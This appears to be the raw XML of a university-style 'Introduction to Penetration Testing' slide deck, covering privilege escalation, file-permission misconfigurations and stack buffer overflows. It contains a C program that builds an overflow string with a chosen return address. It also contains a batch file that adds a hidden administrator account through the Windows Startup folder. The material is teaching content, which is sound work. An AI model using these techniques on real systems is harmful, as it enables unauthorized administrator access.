        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26550372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make_input.c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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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#include &lt;string.h&gt;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endParaRPr lang="en-US" sz="150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int main(int argc, char**argv) {			// construct an overflow string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char buf[1005];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if (argc !=3)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fprintf(stderr,"Usage: %s [offset] [return address in hex]\n",argv[0]);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else {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int a, offset = atoi(argv[1]);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for (int i=0; i&lt;offset; i++)			// write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A’s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  buf[i]='A';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a = strtol(argv[2],NULL,16);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buf[offset]=a&amp;0xFF; buf[offset+1]=((a&amp;0xFF00)&gt;&gt;8);	 // write characters of ret. addr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buf[offset+2]=((a&amp;0xFF0000)&gt;&gt;16); buf[offset+3]=((a&amp;0xFF000000)&gt;&gt;24);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buf[offset+4]='\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      fprintf(stdout,"%s\n",buf); } }			// output the constructed string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4916488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Privilege Escalation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Goal: get instructions executed with higher privileges than you have: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Kernel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Privileged application or service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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> program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A privileged user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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Happened?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US" sz="32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590800" y="5257800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2590800" y="2971800"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="1632" y="1872"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32773" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="187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4" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1690" y="1976"/>
              <a:ext cx="8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125"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>main’s bp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32775" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4064000"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="1632" y="2560"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32776" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="2560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7" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1690" y="2777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2590800" y="3521075"/>
            <a:ext cx="1462088" cy="547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667000" y="3490913"/>
            <a:ext cx="12779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return address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304800" y="21336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Low Addresses</a:t>
            </a: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1409700" y="2667000"/>
            <a:ext cx="1588" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2844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304800" y="4800600"/>
            <a:ext cx="220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High Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32783" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2667000"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="1632" y="1680"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32784" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1680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5" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1690" y="168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buf[9]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32786" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2362200"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="1632" y="1488"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32787" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1488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8" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1690" y="1488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32789" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2057400"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="1632" y="1296"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32790" name="Rectangle 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1296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1" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1690" y="1296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buf[0]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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6248400" y="5257800"/>
            <a:ext cx="15081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stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32793" name="Group 25"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2971800"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="3936" y="1872"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32794" name="Rectangle 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="1872"/>
              <a:ext cx="920" cy="345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5" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994" y="1976"/>
              <a:ext cx="804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FontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AAAA</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32796" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4064000"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="3936" y="2560"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32797" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="2560"/>
              <a:ext cx="920" cy="718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8" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994" y="2777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Main’s frame</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32799" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3521075"/>
            <a:ext cx="1462088" cy="547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6324600" y="3490913"/>
            <a:ext cx="12779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en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address of sub2()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32801" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2667000"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3936" y="1680"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32802" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="1680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3" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994" y="1680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</p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32804" name="Group 36"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2362200"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3936" y="1488"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32805" name="Rectangle 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="1488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6" name="Text Box 38"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994" y="1488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32807" name="Group 39"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2057400"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3936" y="1296"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32808" name="Rectangle 40"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="1296"/>
              <a:ext cx="920" cy="191"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="936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9" name="Text Box 41"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994" y="1296"/>
              <a:ext cx="80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400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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>
                <a:spcBef>
                  <a:spcPts val="875"/>
                </a:spcBef>
                <a:buClr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</a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4724400" y="3429000"/>
            <a:ext cx="990600" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7632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8825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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary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8188" indent="-280988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  Elevating privileges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Getting code run in a privileged context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Exploiting misconfigurations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File permissions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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking services and applications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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328324205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Privilege Escalation –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Windows host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Guest access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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write to: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C:\Documents and Settings\Administrator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Can write to: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C:\Documents and Settings\All Users\Start Menu\Programs\Startup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Privilege Escalation – Example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 simple batch file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elvis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> T!C!B!123 /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elvis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /add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Place this program in C:\Documents and Settings\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AllUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StartMenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Programs\Startup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It will be executed by the administrator (with administrator privileges) at the next logon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Privilege Escalation –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Demo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Note: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Could be noticed by the administrator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During logon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Recognizing the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elvis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” account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Worked because the C:\Documents and Settings\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AllUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StartMenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Programs\Startup directory was writeable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File Permissions –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Windows host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Guest access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Can read registry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Can see what programs run when users (including admin) log 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Can overwrite a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File Permissions – Demo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Demo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Note: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Could be noticed by the administrator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During logon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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worked because the C:\Program Files directory was writeable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Buffer Overflows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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> involves putting more data into a buffer than it has room to hold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charset="0"/>
              </a:rPr>
              <a:t>In some cases, the extra data overwrites other items in memory after the buffer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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Overflowing a buffer may enable you to change/control the flow of execution of the program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499</TotalTime>
  <Words>1773</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>438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Retrospect</vt:lpstr>
      <vt:lpstr>Introduction to Penetration Testing</vt:lpstr>
      <vt:lpstr>Reminder – We Don't Teach People to be Attackers</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation – Example</vt:lpstr>
      <vt:lpstr>Privilege Escalation – Example (cont)</vt:lpstr>
      <vt:lpstr>Privilege Escalation – Demo</vt:lpstr>
      <vt:lpstr>File Permissions – Example</vt:lpstr>
      <vt:lpstr>File Permissions – Demo</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>What Does This Program Do?</vt:lpstr>
      <vt:lpstr>The Stack Segment</vt:lpstr>
      <vt:lpstr>Stack Frames</vt:lpstr>
      <vt:lpstr>Stack Frames (cont)</vt:lpstr>
      <vt:lpstr>Stack Frames (cont)</vt:lpstr>
      <vt:lpstr>Stack Frame - Example</vt:lpstr>
      <vt:lpstr>Stack Frames – Example (cont)</vt:lpstr>
      <vt:lpstr>Ex1.c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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-04T22:29:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-29T19:04:24Z</dcterms:modified>
</cp:coreProperties>
</file>